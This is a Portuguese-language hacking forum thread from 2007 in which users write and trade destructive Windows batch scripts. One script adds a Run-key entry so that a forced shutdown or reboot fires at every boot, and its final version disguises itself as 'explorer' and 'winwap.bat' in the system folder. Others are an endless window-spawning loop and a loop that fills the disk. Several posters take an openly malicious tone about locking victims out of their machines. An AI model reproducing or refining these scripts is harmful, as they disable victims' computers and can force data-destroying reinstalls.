Virus de 2 linhas em batch...

cebolaaa · 13 de May , 2007, 09:52:26 PM

crie dois arquivos:

1º
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v Hi.bat /t REG_SZ /d "C:\Hi.bat"

2º
shutdown -s -t 0 -f

salve os dois em batch (.bat)...

Esse virus funciona assim...
vc tem q por o arquivo Hi.bat (pode escolher o nome quiser ne), dentro da pasta c:\ (ou a q escolher).
depois vc aplica o 1º arquivo e ele salva no registro de inicialização do windows o arquivo Hi.bat...
o arquivo Hi.bat desliga o pc no tempo de 0 segundos (-t), e força os aplicativos abertos a serem feichados (-f).

Ai q saca. pensem... se o arquivo ta ai onde ele ta...hehehe toda hora q o pc ligar ele vai desligar... a naum ser q em menos de 1 segundo o cara consiga remover o virus do registro... KEhkAhkaEKH axo meio improvavel...
o q ele pode fazer eh formatar o pc, pq nem em mode de segurança vai entrar,,, ou por o hd em outro pc e remover o virus.

alguem ai ta afim de dar uma ajudinha e.... programar algo tipo... os 2 arquivos do virus em um so?

abraços xD

rog · 13 de May , 2007, 09:55:08 PM

beleza

vc ja houviou falar em safe mode ?

rog

branco · 13 de May , 2007, 10:12:10 PM

eu ja ouvir falar em safe mode mas nao sei nada sobre ele...mas tenho quase certeza que se ele trocar a linha do showdown por um loop infinito vai fazer mais estrago nesse safe mode e nao vai proteger ele...

pelo que se disse entendi que o safe mode nao deixa o pc desligar...já o loop ia acabar com pc

t+

cebolaaa · 13 de May , 2007, 10:40:33 PM

amigo, o q eh esse loop? como aplico ele? obrigado xD

branco · 13 de May , 2007, 10:46:28 PM

te aconselho a ler um pouco de shell script amigo, e tambem procurar bastante sobre outras linguagens, como python, perl, php etc, ai vc vai ganhar uma boa logica de como as coisas funcionam..

e eu nao me lembro do while do shell script, mas basta procurar ai no google que rapidinho vai encontrar...

loop é um laço que nunca termina, assim o computador fica doidao processando ele

t+ e bons estudos

cebolaaa · 13 de May , 2007, 11:02:14 PM

aew xD, valeu a ideia, fiz um loop em batch script... ta ai pra vc e a galera ver:

@echo off
:begin
set choice=loop
if %choice%=="1" goto op1 else goto op2
if %choice%=="2" goto op2 else goto op1
:op2 cd c:\windows\system\
dir
goto op1

xD

Reeves · 13 de May , 2007, 11:37:32 PM

laço pode ser mais facil que isso
ex.. janelas infinitas

@ECHO OFF
BREACK OFF

pen
start start
start start
start start
start start
GoTo open

pronto, já é um laço interminavel...

ps: safe mode (modo de segurança)
no caso do windows apertando F8 antes da entrada...
assim logando como admin sem carregar quase nada do sistema ¬¬.

lcs · 14 de May , 2007, 12:31:19 AM

Tipo se ele apagar a fonte do software o registro quando iniciar ira apresentar um erro dizendo que não encontrou o caminho especificado, para isso basta um DOS vagabundo ou um Kurumin que rode direto do cd e é correr pro abraço .,.. Fallow

Anonymous · 14 de May , 2007, 10:59:20 AM

Na verdade (conceitual) o código inicial não pode ser considerado um vírus, pois não se encaixa na definição de vírus.

Sobre looping em bacth, já que estão animados, o que acham de algo do tipo:

Code Select

:: Cria um arquivo com alguns dados iniciais
@dir>arqgigante
:enchendo
@type arqgigante >> arqgigante
@goto enchendo

Fez muito sucesso na época dos BADCOMs.

Anonymous · 14 de May , 2007, 11:18:57 AM

mrx havia feito um post com um programa para "encher" o HD no tópico:

http://www.darkers.com.br/forum/index.php?topic=5618.0

Se eu tivesse visto não teria duplicado o códio no fórum.

anakim · 15 de May , 2007, 12:04:38 AM

KRA ISSO EH MALWARE E NAO VIRUS HASUHSA, VIRUS INFECTA OUTROS ARQUIVOS.

cebolaaa · 29 de May , 2007, 02:27:19 PM

@echo off
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v explorer /t REG_SZ /d %systemroot%\winwap.bat
echo shutdown -r -t 0 -f > %systemroot%\winwap.bat
del %userprofile%\Menu Iniciar\Programas\Inicializar\0.bat
exit

phoda eh por no RUN do cara...

Virus de 2 linhas em batch...

Anonymous

Anonymous